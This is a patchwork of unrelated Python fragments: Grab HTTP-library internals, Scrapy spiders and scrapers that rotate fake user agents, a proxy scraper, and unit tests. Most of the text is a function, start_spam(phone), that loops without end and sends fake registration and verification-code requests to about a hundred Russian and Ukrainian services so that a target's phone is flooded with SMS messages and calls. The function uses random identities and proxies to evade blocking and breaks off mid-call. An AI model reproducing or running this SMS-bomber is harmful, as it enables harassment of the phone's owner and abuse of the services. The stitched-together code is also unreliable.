None: raise GrabMisuseError( "Neither `post` or `multipart_post`" " options was specified for the %s" " request" % grab.request_method ) if grab.request_method == "POST": self.curl.setopt(pycurl.POST, 1) if grab.config["multipart_post"]: if isinstance(grab.config["multipart_post"], six.string_types): raise error.GrabMisuseError("multipart_post option could not be a string") post_items = normalize_http_values( grab.config["multipart_post"], charset=grab.config["charset"], ignore_classes=(UploadFile, UploadContent), ) # py3 hack if six.PY3: post_items = decode_pairs(post_items, grab.config["charset"]) # import pdb; pdb.set_trace() self.curl.setopt(pycurl.HTTPPOST, process_upload_items(post_items)) elif 
grab.config["post"]: post_data = normalize_post_data(grab.config["post"], grab.config["charset"]) # py3 hack # if six.PY3: # post_data = smart_unicode(post_data, # grab.config['charset']) self.curl.setopt(pycurl.POSTFIELDS, post_data) else: self.curl.setopt(pycurl.POSTFIELDS, "") elif grab.request_method == "PUT": data = grab.config["post"] if isinstance(data, six.text_type): # py3 hack # if six.PY3: # data = data.encode('utf-8') # else: raise error.GrabMisuseError("Value of post option could be only " "byte string if PUT method is used") self.curl.setopt(pycurl.UPLOAD, 1) self.curl.setopt(pycurl.CUSTOMREQUEST, "PUT") self.curl.setopt(pycurl.READFUNCTION, StringIO(data).read) self.curl.setopt(pycurl.INFILESIZE, len(data)) elif grab.request_method == "PATCH": data = grab.config["post"] if isinstance(data, six.text_type): raise error.GrabMisuseError("Value of post option could be only byte " "string if PATCH method is used") self.curl.setopt(pycurl.UPLOAD, 1) self.curl.setopt(pycurl.CUSTOMREQUEST, "PATCH") self.curl.setopt(pycurl.READFUNCTION, StringIO(data).read) self.curl.setopt(pycurl.INFILESIZE, len(data)) elif grab.request_method == "DELETE": self.curl.setopt(pycurl.CUSTOMREQUEST, "DELETE") elif grab.request_method == "HEAD": self.curl.setopt(pycurl.NOBODY, 1) elif grab.request_method == "UPLOAD": self.curl.setopt(pycurl.UPLOAD, 1) elif grab.request_method == "GET": self.curl.setopt(pycurl.HTTPGET, 1) elif grab.request_method == "OPTIONS": data = grab.config["post"] if data is not None: if isinstance(data, six.text_type): raise error.GrabMisuseError( "Value of post option could be only byte " "string if PATCH method is used" ) self.curl.setopt(pycurl.UPLOAD, 1) self.curl.setopt(pycurl.READFUNCTION, StringIO(data).read) self.curl.setopt(pycurl.INFILESIZE, len(data)) self.curl.setopt(pycurl.CUSTOMREQUEST, "OPTIONS") else: raise error.GrabMisuseError("Invalid method: %s" % grab.request_method) headers = grab.config["common_headers"] if grab.config["headers"]: headers.update(grab.config["headers"]) # This is required to avoid some problems headers.update({"Expect": ""}) header_tuples = [str("%s: %s" % x) for x in headers.items()] self.curl.setopt(pycurl.HTTPHEADER, header_tuples) self.process_cookie_options(grab, request_url) if grab.config["referer"]: self.curl.setopt(pycurl.REFERER, str(grab.config["referer"])) if grab.config["proxy"]: self.curl.setopt(pycurl.PROXY, str(grab.config["proxy"])) else: self.curl.setopt(pycurl.PROXY, "") if grab.config["proxy_userpwd"]: self.curl.setopt(pycurl.PROXYUSERPWD, str(grab.config["proxy_userpwd"])) if grab.config["proxy_type"]: key = "PROXYTYPE_%s" % grab.config["proxy_type"].upper() self.curl.setopt(pycurl.PROXYTYPE, getattr(pycurl, key)) if grab.config["encoding"]: if "gzip" in grab.config["encoding"] and "zlib" not in pycurl.version: raise error.GrabMisuseError( "You can not use gzip encoding because " "pycurl was built without zlib support" ) self.curl.setopt(pycurl.ENCODING, grab.config["encoding"]) if grab.config["userpwd"]: self.curl.setopt(pycurl.USERPWD, str(grab.config["userpwd"])) if grab.config.get("interface") is not None: self.curl.setopt(pycurl.INTERFACE, grab.config["interface"]) if grab.config.get("reject_file_size") is not None: self.curl.setopt(pycurl.MAXFILESIZE, grab.config["reject_file_size"])
def get_html(url):
    sleep(1)
    headers = {'Accept': '*/*', 'User-Agent': generate_user_agent()}
    response = requests.get(url, headers=headers)
    return response.text
# -*- coding: utf-8 -*-
from user_agent import generate_user_agent

BOT_NAME = 'comentariosg1'

SPIDER_MODULES = ['comentariosg1.spiders']
NEWSPIDER_MODULE = 'comentariosg1.spiders'

USER_AGENT = generate_user_agent(device_type=['desktop'])

# Obey robots.txt rules
ROBOTSTXT_OBEY = True

FEED_EXPORT_ENCODING = 'utf-8'
def test_mac_chrome(self):
    for x in range(100):
        ua = generate_user_agent(platform='mac', navigator='chrome')
        self.assertTrue(re.search(r'OS X \d+_\d+(_\d+\b|\b)', ua))
def process_config(self, grab): req = Request(data=None) try: request_url = normalize_url(grab.config['url']) except Exception as ex: raise error.GrabInvalidUrl(u'%s: %s' % (six.text_type(ex), grab.config['url'])) req.url = request_url method = grab.detect_request_method() req.method = make_str(method) req.config_body_maxsize = grab.config['body_maxsize'] req.config_nobody = grab.config['nobody'] req.timeout = grab.config['timeout'] req.connect_timeout = grab.config['connect_timeout'] extra_headers = {} # Body processing if grab.config['body_inmemory']: pass else: if not grab.config['body_storage_dir']: raise GrabMisuseError('Option body_storage_dir is not defined') file_, path_ = self.setup_body_file( grab.config['body_storage_dir'], grab.config['body_storage_filename'], create_dir=grab.config['body_storage_create_dir']) req.response_file = file_ req.response_path = path_ if grab.config['multipart_post'] is not None: post_data = grab.config['multipart_post'] if isinstance(post_data, six.binary_type): pass elif isinstance(post_data, six.text_type): raise GrabMisuseError('Option multipart_post data' ' does not accept unicode.') else: post_items = normalize_http_values( grab.config['multipart_post'], charset=grab.config['charset'], ignore_classes=(UploadFile, UploadContent), ) post_items = decode_pairs(post_items, grab.config['charset']) post_items = process_upload_items(post_items) post_data, content_type = encode_multipart_formdata(post_items) extra_headers['Content-Type'] = content_type extra_headers['Content-Length'] = len(post_data) req.data = post_data elif grab.config['post'] is not None: post_data = normalize_post_data(grab.config['post'], grab.config['charset']) # py3 hack # if six.PY3: # post_data = smart_unicode(post_data, # grab.config['charset']) extra_headers['Content-Length'] = len(post_data) req.data = post_data if method in ('POST', 'PUT'): if (grab.config['post'] is None and grab.config['multipart_post'] is None): raise GrabMisuseError('Neither `post` or `multipart_post`' ' options was specified for the %s' ' request' % method) # Proxy if grab.config['proxy']: req.proxy = grab.config['proxy'] if grab.config['proxy_userpwd']: req.proxy_userpwd = grab.config['proxy_userpwd'] if grab.config['proxy_type']: req.proxy_type = grab.config['proxy_type'] else: req.proxy_type = 'http' # User-Agent if grab.config['user_agent'] is None: if grab.config['user_agent_file'] is not None: with open(grab.config['user_agent_file']) as inf: lines = inf.read().splitlines() grab.config['user_agent'] = random.choice(lines) else: grab.config['user_agent'] = generate_user_agent() extra_headers['User-Agent'] = grab.config['user_agent'] # Headers headers = extra_headers headers.update(grab.config['common_headers']) if grab.config['headers']: headers.update(grab.config['headers']) req.headers = headers # Cookies self.process_cookie_options(grab, req) self._request = req
def test_navigator_option_tuple(self):
    for x in range(100):
        ua = generate_user_agent(navigator=('chrome',))
        ua = generate_user_agent(navigator=('chrome', 'firefox'))
        ua = generate_user_agent(navigator=('chrome', 'firefox', 'ie'))
def infoParse(self, response): item = CfachinaItem() currentPage = response.meta['currentPage'] organid = response.meta['organid'] callbacks = response.meta['callbacks'] selectType = response.meta['selectType'] #第一页时,获取全局totalPage if currentPage == 1: totalPage = response.xpath( '//li[text()="共["]/span/text()').extract_first() totalPage = int( totalPage) if totalPage and totalPage.isdigit() else None #非第一页时,从meta里获取全局totalPage else: totalPage = response.meta['totalPage'] configs = Con.main(response.url) if configs['list']['v'] is not '': res = S.select_content(response, configs['list']) else: res = [response] #res可能为None,若非None,则parse数据 if res is not None: for info in res: result = dict() for config in configs['data']: k = config['En'] result[k] = S.select_content(info, config) result[k] = S.replace_all(result[k]) # print(result) item['result'] = result item['keys'] = configs['list']['keys'] item['db'] = configs['list']['db'] yield item #根据类和totalPage判断是否还有下一页,有就继续request nextpage if isinstance(totalPage, int) and currentPage < totalPage / 20: currentPage += 1 data = { 'organid': organid, 'currentPage': str(currentPage), 'pageSize': '20', 'selectType': selectType } url = 'http://www.cfachina.org/cfainfo/organbaseinfoOneServlet?' + urllib.parse.urlencode( data) yield scrapy.Request( url, callback=eval(callbacks), headers={ 'User-Agent': generate_user_agent(os=('win', 'mac', 'linux')) }, meta={ 'currentPage': currentPage, 'totalPage': totalPage, 'organid': organid, 'callbacks': callbacks, 'selectType': selectType }, )
def random_user_agent():
    global header
    header['User-Agent'] = generate_user_agent()
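A small, self-contained sketch of how a rotation helper like random_user_agent is typically driven, assuming a module-level header dict as in the snippet above (the URLs are illustrative):

import requests
from user_agent import generate_user_agent

header = {'Accept': '*/*'}

def random_user_agent():
    global header
    header['User-Agent'] = generate_user_agent()

for url in ('https://example.com/page/1', 'https://example.com/page/2'):
    random_user_agent()                  # rotate the user agent before each request
    requests.get(url, headers=header)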
def cdfQualificationListparse(self, response): """从业资格信息""" # '''保存为本地html''' # print(response.text) # with open("1.html","wb") as f: # f.write(response.body) if self.page == 1: self.cdfQualificationListTotalPages = int( response.xpath('//ul[@class="yema"]/li[last()]/span/text()'). extract_first()) currentPage = 1 for info in response.xpath( '//td[text()=" 机构编号 "]/parent::tr/following-sibling::tr'): #获取机构编号,构造九表url organid = info.xpath('td[1]/text()').extract_first() #构造url #资管业务--暂时未写逻辑 # data_ = {'organid':organid} # yield scrapy.Request('http://www.cfachina.org/cfainfo/personOfAssetmanageinfoServlet?'+urllib.parse.urlencode(data_), # meta = {'organid':organid}, # callback = self.infoParse1, # headers = {'User-Agent':generate_user_agent(os=('win','mac','linux'))} # ) for selecttype in [{ 't': 'organbaseinfo', 'callback': 'self.infoParse' }, { 't': 'organhisinfo', 'callback': 'self.infoParse' }, { 't': 'organbranchinfo', 'callback': 'self.infoParse' }, { 't': 'supervisorinfo', 'callback': 'self.infoParse' }, { 't': 'personinfo', 'callback': 'self.infoParse' }, { 't': 'organshareholderinfo', 'callback': 'self.infoParse' }, { 't': 'organcreditinfo', 'callback': 'self.infoParse' }, { 't': 'organfinancialinfo', 'callback': 'self.infoParse' }, { 't': 'subdebtmonthinfo', 'callback': 'self.infoParse' }]: #urlencode生成method:get url data = { 'organid': organid, 'currentPage': str(currentPage), 'pageSize': '20', 'selectType': selecttype['t'] } url = 'http://www.cfachina.org/cfainfo/organbaseinfoOneServlet?' + urllib.parse.urlencode( data) callbacks = selecttype['callback'] selectType = selecttype['t'] #发送url request yield scrapy.Request(url, meta={ 'currentPage': currentPage, 'organid': organid, 'callbacks': callbacks, 'selectType': selectType }, callback=eval(callbacks), headers={ 'User-Agent': generate_user_agent(os=('win', 'mac', 'linux')) }) if self.page < self.cdfQualificationListTotalPages: self.page += 1 nextdata = self.madedata(self.page) nextheaders = {'User-Agent': generate_user_agent()} nexturl = 'http://www.cfachina.org/cfainfo/organbaseinfoServlet' yield scrapy.FormRequest(nexturl, method='POST', formdata=nextdata, headers=nextheaders, callback=self.cdfQualificationListparse)
import json
import os
import re
import time
from multiprocessing import Lock, Pool, Process, RLock

import requests
import user_agent
from requests.exceptions import RequestException

filename = 'result.txt'
file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), filename)
headers = {'user-agent': user_agent.generate_user_agent()}


def get_one_page(url):
    try:
        resp = requests.get(url, headers=headers)
        if resp.status_code == 200:
            print("Download-Success {}".format(url))
            return resp.text
        return None
    except RequestException:
        print("Download-Failed {}".format(url))
        return None


def parse_one_page(html):
    pattern = re.compile(
        '<dd>.*?board-index.*?>(\d+)</i>.*?' +
        'data-src="(.*?)".*?' +
import os
import sys
import json
import re
import time

import requests
from user_agent import generate_user_agent  # used for the default request headers below

sys.path.append(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))))
from SpiderHelp import SpiderHelp
from RedisHelp import _Request, _RedisSpider, logger

conn_flag = False
REDISFLAG = True
TODAY = time.strftime('%Y-%m-%d')
Headers = {'User-Agent': generate_user_agent(os=('win',))}
Cookies = {'.ASPXANONYMOUS': 'pdtC5gfC0wEkAAAAOWIzZDNiMGEtYjUzOS00YzYyLWEyZTctNWM2OTdmOGM2ZDcz0'}
MAX = 2**15


def get_area():
    res = requests.get('http://js.51jobcdn.com/in/js/2016/layer/area_array_c.js?20171103')
    RESULT = json.loads(re.compile('area=(\{.*?\})', re.S).search(res.text).group(1))
    return RESULT


class SinaspiderSpider(_RedisSpider, SpiderHelp):  # ,scrapy.Spider
    name = '51job_test'
    start_urls = get_area()
    state = {}
import json
import logging
import time
from datetime import datetime as dt
from typing import Set

import brotli
import requests
from bs4 import BeautifulSoup
from user_agent import generate_user_agent

from .tools.proxies_manipulation import parse_proxies, short_url

logger = logging.getLogger(__name__)

standard_headers = {"User-Agent": generate_user_agent()}
timeout = 6


def proxy50_50() -> Set[str]:
    url = "https://proxy50-50.blogspot.com/"
    proxies_set = set()
    try:
        r = requests.get(url, headers=standard_headers, timeout=timeout)
        proxies_set.update(parse_proxies(r.text))
        logger.info(
            f"From {short_url(r.url)} were parsed {len(proxies_set)} proxies")
    except Exception:
        logger.exception(f"Proxies from {short_url(url)} were not loaded :(")
    return proxies_set
def start_spam(phone): def format_phone(phone, phone_mask): phone_list = list(phone) for i in phone_list: phone_mask = phone_mask.replace("#", i, 1) return phone_mask name = "" for _ in range(12): name = name + choice( "123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM") password = name + choice( "123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM") email = name + "@gmail.com" phone9 = phone[1:] headers = {"User-Agent": generate_user_agent()} proxies = generate_proxy() while True: try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post("https://zoloto585.ru/api/bcard/reg/", json={ "name": "", "surname": "", "patronymic": "", "sex": "m", "birthdate": "..", "phone": formatted_phone, "email": "", "city": "" }, headers=headers) except: pass try: formatted_phone = format_phone(phone[1:], "8(###)###-##-##") post( "http://xn---72-5cdaa0cclp5fkp4ewc.xn--p1ai/user_account/ajax222.php?do=sms_code", data={"phone": formatted_phone}, headers=headers) except: pass try: post("https://youla.ru/web-api/auth/request_code", data={"phone": phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post("https://yaponchik.net/login/login.php", data={ "login": "******", "countdown": "0", "step": "phone", "redirect": "/profile/", "phone": formatted_phone, "code": "" }, headers=headers) except: pass try: post("https://eda.yandex/api/v1/user/request_authentication_code", json={"phone_number": "+" + phone}, headers=headers) except: pass try: post("https://api.iconjob.co/api/auth/verification_code", json={"phone": phone}, headers=headers) except: pass try: post("https://cabinet.wi-fi.ru/api/auth/by-sms", data={"msisdn": phone}, headers=headers) except: pass try: post("https://ng-api.webbankir.com/user/v2/create", json={ "lastName": "иванов", "firstName": "иван", "middleName": "иванович", "mobilePhone": phone, "email": email, "smsCode": "" }, headers=headers) except: pass try: post("https://shop.vsk.ru/ajax/auth/postSms/", data={"phone": phone}, headers=headers) except: pass try: post("https://passport.twitch.tv/register?trusted_request=true", json={ "birthday": { "day": 11, "month": 11, "year": 1999 }, "client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp", "include_verification_code": True, "password": password, "phone_number": phone, "username": name }, headers=headers) except: pass try: post("https://b.utair.ru/api/v1/login/", json={ "login": phone, "confirmation_type": "call_code" }, headers=headers) except: pass try: formatted_phone = format_phone(phone, "#(###)###-##-##") post("https://www.r-ulybka.ru/login/form_ajax.php", data={ "action": "auth", "phone": formatted_phone }, headers=headers) except: pass try: post("https://uklon.com.ua/api/v1/account/code/send", headers={ "client_id": "6289de851fc726f887af8d5d7a56c635", "User-Agent": generate_user_agent() }, json={"phone": phone}) except: pass try: post("https://partner.uklon.com.ua/api/v1/registration/sendcode", headers={ "client_id": "6289de851fc726f887af8d5d7a56c635", "User-Agent": generate_user_agent() }, json={"phone": phone}) except: pass try: post("https://secure.ubki.ua/b2_api_xml/ubki/auth", json={ "doc": { "auth": { "mphone": "+" + phone, "bdate": "11.11.1999", "deviceid": "00100", "version": "1.0", "source": "site", "signature": "undefined" } } }, headers={ "Accept": "application/json", "User-Agent": generate_user_agent() }) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post("https://www.top-shop.ru/login/loginByPhone/", data={"phone": 
formatted_phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "8(###)###-##-##") post("https://topbladebar.ru/user_account/ajax222.php?do=sms_code", data={"phone": formatted_phone}, headers=headers) except: pass try: post( "https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru", data={"phone_number": phone}, headers=headers) except: pass try: post("https://m.tiktok.com/node-a/send/download_link", json={ "slideVerify": 0, "language": "ru", "PhoneRegionCode": "7", "Mobile": phone9, "page": { "pageName": "home", "launchMode": "direct", "trafficType": "" } }, headers=headers) except: pass try: post("https://thehive.pro/auth/signup", json={"phone": "+" + phone}, headers=headers) except: pass try: post(f"https://msk.tele2.ru/api/validation/number/{phone}", json={"sender": "Tele2"}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ### - ## - ##") post("https://www.taxi-ritm.ru/ajax/ppp/ppp_back_call.php", data={ "RECALL": "Y", "BACK_CALL_PHONE": formatted_phone }, headers=headers) except: pass try: post("https://www.tarantino-family.com/wp-admin/admin-ajax.php", data={ "action": "callback_phonenumber", "phone": phone }, headers=headers) except: pass try: post("https://lk.tabris.ru/reg/", data={ "action": "phone", "phone": phone }, headers=headers) except: pass try: post("https://tabasko.su/", data={ "IS_AJAX": "Y", "COMPONENT_NAME": "AUTH", "ACTION": "GET_CODE", "LOGIN": phone }, headers=headers) except: pass try: post("https://www.sushi-profi.ru/api/order/order-call/", json={ "phone": phone9, "name": name }, headers=headers) except: pass try: post("https://client-api.sushi-master.ru/api/v1/auth/init", json={"phone": phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone9, "8(###)###-##-##") post( "https://xn--80aaispoxqe9b.xn--p1ai/user_account/ajax.php?do=sms_code", data={"phone": formatted_phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone9, "8 (###) ###-##-##") post("http://sushigourmet.ru/auth", data={ "phone": formatted_phone, "stage": 1 }, headers=headers) except: pass try: post("https://sushifuji.ru/sms_send_ajax.php", data={ "name": "false", "phone": phone }, headers=headers) except: pass try: post("https://api.sunlight.net/v3/customers/authorization/", data={"phone": phone}, headers=headers) except: pass try: get("https://suandshi.ru/mobile_api/register_mobile_user", params={"phone": phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone9, "8-###-###-##-##") post("https://pizzasushiwok.ru/index.php", data={ "mod_name": "registration", "tpl": "restore_password", "phone": formatted_phone }, headers=headers) except: pass try: get("https://www.sportmaster.ua/", params={ "module": "users", "action": "SendSMSReg", "phone": phone }, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") get("https://www.sportmaster.ru/user/session/sendSmsCode.do", params={"phone": formatted_phone}, headers=headers) except: pass try: post( "https://www.sms4b.ru/bitrix/components/sms4b/sms.demo/ajax.php", data={ "demo_number": "+" + phone, "ajax_demo_send": "1" }, headers=headers) except: pass try: post("https://smart.space/api/users/request_confirmation_code/", json={ "mobile": "+" + phone, "action": "confirm_mobile" }, headers=headers) except: pass try: post("https://shopandshow.ru/sms/password-request/", data={ "phone": "+" + phone, "resend": 0 }, headers=headers) except: pass try: post( 
"https://shafa.ua/api/v3/graphiql", json={ "operationName": "RegistrationSendSms", "variables": { "phoneNumber": "+" + phone }, "query": "mutation RegistrationSendSms($phoneNumber: String!) {\n unauthorizedSendSms(phoneNumber: $phoneNumber) {\n isSuccess\n userToken\n errors {\n field\n messages {\n message\n code\n __typename\n }\n __typename\n }\n __typename\n }\n}\n" }, headers=headers) except: pass try: post( "https://shafa.ua/api/v3/graphiql", json={ "operationName": "sendResetPasswordSms", "variables": { "phoneNumber": "+" + phone }, "query": "mutation sendResetPasswordSms($phoneNumber: String!) {\n resetPasswordSendSms(phoneNumber: $phoneNumber) {\n isSuccess\n userToken\n errors {\n ...errorsData\n __typename\n }\n __typename\n }\n}\n\nfragment errorsData on GraphResponseError {\n field\n messages {\n code\n message\n __typename\n }\n __typename\n}\n" }, headers=headers) except: pass try: post("https://sayoris.ru/?route=parse/whats", data={"phone": phone}, headers=headers) except: pass try: post("https://api.saurisushi.ru/Sauri/api/v2/auth/login", data={ "data": { "login": phone9, "check": True, "crypto": { "captcha": "739699" } } }, headers=headers) except: pass try: post("https://pass.rutube.ru/api/accounts/phone/send-password/", json={"phone": "+" + phone}, headers=headers) except: pass try: post("https://rutaxi.ru/ajax_auth.html", data={ "l": phone9, "c": "3" }, headers=headers) except: pass try: post("https://rieltor.ua/api/users/register-sms/", json={ "phone": phone, "retry": 0 }, headers=headers) except: pass try: post( "https://richfamily.ru/ajax/sms_activities/sms_validate_phone.php", data={"phone": "+" + phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+#(###)###-##-##") post("https://www.rendez-vous.ru/ajax/SendPhoneConfirmationNew/", data={ "phone": formatted_phone, "alien": "0" }, headers=headers) except: pass try: get("https://oapi.raiffeisen.ru/api/sms-auth/public/v1.0/phone/code", params={"number": phone}, headers=headers) except: pass try: post("https://qlean.ru/clients-api/v2/sms_codes/auth/request_code", json={"phone": phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+#-###-###-##-##") post("https://api.pozichka.ua/v1/registration/send", json={"RegisterSendForm": { "phone": formatted_phone }}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post( "https://pliskov.ru/Cube.MoneyRent.Orchard.RentRequest/PhoneConfirmation/SendCode", data={"phone": formatted_phone}, headers=headers) except: pass try: get("https://cabinet.planetakino.ua/service/sms", params={"phone": phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone9, "8-###-###-##-##") post("https://pizzasushiwok.ru/index.php", data={ "mod_name": "call_me", "task": "request_call", "name": name, "phone": formatted_phone }, headers=headers) except: pass try: post("https://pizzasinizza.ru/api/phoneCode.php", json={"phone": phone9}, headers=headers) except: pass try: post("https://pizzakazan.com/auth/ajax.php", data={ "phone": "+" + phone, "method": "sendCode" }, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-####") post("https://pizza46.ru/ajaxGet.php", data={"phone": formatted_phone}, headers=headers) except: pass try: post( "https://piroginomerodin.ru/index.php?route=sms/login/sendreg", data={"telephone": "+" + phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+#-###-###-##-##") 
post("https://paylate.ru/registry", data={ "mobile": formatted_phone, "first_name": name, "last_name": name, "nick_name": name, "gender-client": 1, "email": email, "action": "registry" }, headers=headers) except: pass try: post( "https://www.panpizza.ru/index.php?route=account/customer/sendSMSCode", data={"telephone": "8" + phone9}, headers=headers) except: pass try: post("https://www.ozon.ru/api/composer-api.bx/_action/fastEntry", json={ "phone": phone, "otpId": 0 }, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-####") post("https://www.osaka161.ru/local/tools/webstroy.webservice.php", data={ "name": "Auth.SendPassword", "params[0]": formatted_phone }, headers=headers) except: pass try: post("https://ontaxi.com.ua/api/v2/web/client", json={ "country": "UA", "phone": phone[3:] }, headers=headers) except: pass try: get("https://secure.online.ua/ajax/check_phone/", params={"reg_phone": phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone9, "8 (###) ###-##-##") get("https://okeansushi.ru/includes/contact.php", params={ "call_mail": "1", "ajax": "1", "name": name, "phone": formatted_phone, "call_time": "1", "pravila2": "on" }, headers=headers) except: pass try: post( "https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone", data={"st.r.phone": "+" + phone}, headers=headers) except: pass try: post("https://nn-card.ru/api/1.0/covid/login", json={"phone": phone}, headers=headers) except: pass try: post("https://www.nl.ua", data={ "component": "bxmaker.authuserphone.login", "sessid": "bf70db951f54b837748f69b75a61deb4", "method": "sendCode", "phone": phone, "registration": "N" }, headers=headers) except: pass try: post("https://www.niyama.ru/ajax/sendSMS.php", data={ "REGISTER[PERSONAL_PHONE]": phone, "code": "", "sendsms": "Выслать код" }, headers=headers) except: pass try: post("https://account.my.games/signup_send_sms/", data={"phone": phone}, headers=headers) except: pass try: post("https://auth.multiplex.ua/login", json={"login": phone}, headers=headers) except: pass try: post( "https://prod.tvh.mts.ru/tvh-public-api-gateway/public/rest/general/send-code", params={"msisdn": phone}, headers=headers) except: pass try: post("https://www.moyo.ua/identity/registration", data={ "firstname": name, "phone": phone, "email": email }, headers=headers) except: pass try: post( "https://mos.pizza/bitrix/components/custom/callback/templates/.default/ajax.php", data={ "name": name, "phone": phone }, headers=headers) except: pass try: post("https://www.monobank.com.ua/api/mobapplink/send", data={"phone": "+" + phone}, headers=headers) except: pass try: post( "https://moneyman.ru/registration_api/actions/send-confirmation-code", data="+" + phone, headers=headers) except: pass try: post("https://my.modulbank.ru/api/v2/registration/nameAndPhone", json={ "FirstName": name, "CellPhone": phone, "Package": "optimal" }, headers=headers) except: pass try: post("https://mobileplanet.ua/register", data={ "klient_name": name, "klient_phone": "+" + phone, "klient_email": email }, headers=headers) except: pass try: get("https://my.mistercash.ua/ru/send/sms/registration", params={"number": "+" + phone}, headers=headers) except: pass try: get("https://menza-cafe.ru/system/call_me.php", params={ "fio": name, "phone": phone, "phone_number": "1" }, headers=headers) except: pass try: post( "https://www.menu.ua/kiev/delivery/registration/direct-registration.html", data={ "user_info[fullname]": name, "user_info[phone]": phone, 
"user_info[email]": email, "user_info[password]": password, "user_info[conf_password]": password }, headers=headers) except: pass try: post("https://www.menu.ua/kiev/delivery/profile/show-verify.html", data={ "phone": phone, "do": "phone" }, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# ### ### ## ##") get("https://makimaki.ru/system/callback.php", params={ "cb_fio": name, "cb_phone": formatted_phone }, headers=headers) except: pass try: post( "https://makarolls.ru/bitrix/components/aloe/aloe.user/login_new.php", data={ "data": phone, "metod": "postreg" }, headers=headers) except: pass try: post( "https://api-rest.logistictech.ru/api/v1.1/clients/request-code", json={"phone": phone}, headers={ "Restaurant-chain": "c0ab3d88-fba8-47aa-b08d-c7598a3be0b9", "User-Agent": generate_user_agent() }) except: pass try: post("https://loany.com.ua/funct/ajax/registration/code", data={"phone": phone}, headers=headers) except: pass try: post( "https://lenta.com/api/v1/authentication/requestValidationCode", json={"phone": "+" + phone}, headers=headers) except: pass try: post("https://koronapay.com/transfers/online/api/users/otps", data={"phone": phone}, headers=headers) except: pass try: post("https://api.kinoland.com.ua/api/v1/service/send-sms", headers={ "Agent": "website", "User-Agent": generate_user_agent() }, json={ "Phone": phone, "Type": 1 }) except: pass try: formatted_phone = format_phone(phone, "# (###) ###-##-##") post("https://kilovkusa.ru/ajax.php", params={ "block": "auth", "action": "send_register_sms_code", "data_type": "json" }, data={"phone": formatted_phone}, headers=headers) except: pass try: post( "https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms", json={"phone": "+" + phone}, headers=headers) except: pass try: post("https://kaspi.kz/util/send-app-link", data={"address": phone9}, headers=headers) except: pass try: post("https://app.karusel.ru/api/v1/phone/", data={"phone": phone}, headers=headers) except: pass try: post("https://izi.ua/api/auth/register", json={ "phone": "+" + phone, "name": name, "is_terms_accepted": True }, headers=headers) except: pass try: post("https://izi.ua/api/auth/sms-login", json={"phone": "+" + phone}, headers=headers) except: pass try: post("https://api.ivi.ru/mobileapi/user/register/phone/v6", data={"phone": phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+## (###) ###-##-##") post("https://iqlab.com.ua/session/ajaxregister", data={"cellphone": formatted_phone}, headers=headers) except: pass try: post("https://www.ingos.ru/api/v1/lk/auth/register/fast/step2", headers={ "Referer": "https://www.ingos.ru/cabinet/registration/personal", "User-Agent": generate_user_agent() }, json={ "Birthday": "1986-07-10T07:19:56.276+02:00", "DocIssueDate": "2004-02-05T07:19:56.276+02:00", "DocNumber": randint(500000, 999999), "DocSeries": randint(5000, 9999), "FirstName": name, "Gender": "M", "LastName": name, "SecondName": name, "Phone": phone9, "Email": email }) except: pass try: post("https://terra-1.indriverapp.com/api/authorization?locale=ru", data={ "mode": "request", "phone": "+" + phone, "phone_permission": "unknown", "stream_id": 0, "v": 3, "appversion": "3.20.6", "osversion": "unknown", "devicemodel": "unknown" }, headers=headers) except: pass try: post("https://api.imgur.com/account/v1/phones/verify", json={ "phone_number": phone, "region_code": "RU" }, headers=headers) except: pass try: post("https://www.icq.com/smsreg/requestPhoneValidation.php", data={ "msisdn": phone, "locale": 
"en", "countryCode": "ru", "version": "1", "k": "ic1rtwz1s1Hj1O0r", "r": "46763" }, headers=headers) except: pass try: get("https://api.hmara.tv/stable/entrance", params={"contact": phone}, headers=headers) except: pass try: post("https://helsi.me/api/healthy/accounts/login", json={ "phone": phone, "platform": "PISWeb" }, headers=headers) except: pass try: post("https://www.hatimaki.ru/register/", data={ "REGISTER[LOGIN]": phone, "REGISTER[PERSONAL_PHONE]": phone, "REGISTER[SMS_CODE]": "", "resend-sms": "1", "REGISTER[EMAIL]": "", "register_submit_button": "Зарегистрироваться" }, headers=headers) except: pass try: post("https://guru.taxi/api/v1/driver/session/verify", json={"phone": { "code": 1, "number": phone9 }}, headers=headers) except: pass try: post("https://crm.getmancar.com.ua/api/veryfyaccount", json={ "phone": "+" + phone, "grant_type": "password", "client_id": "gcarAppMob", "client_secret": "SomeRandomCharsAndNumbersMobile" }, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post("https://foodband.ru/api?call=calls", data={ "customerName": name, "phone": formatted_phone, "g-recaptcha-response": "" }, headers=headers) except: pass try: get("https://foodband.ru/api/", params={ "call": 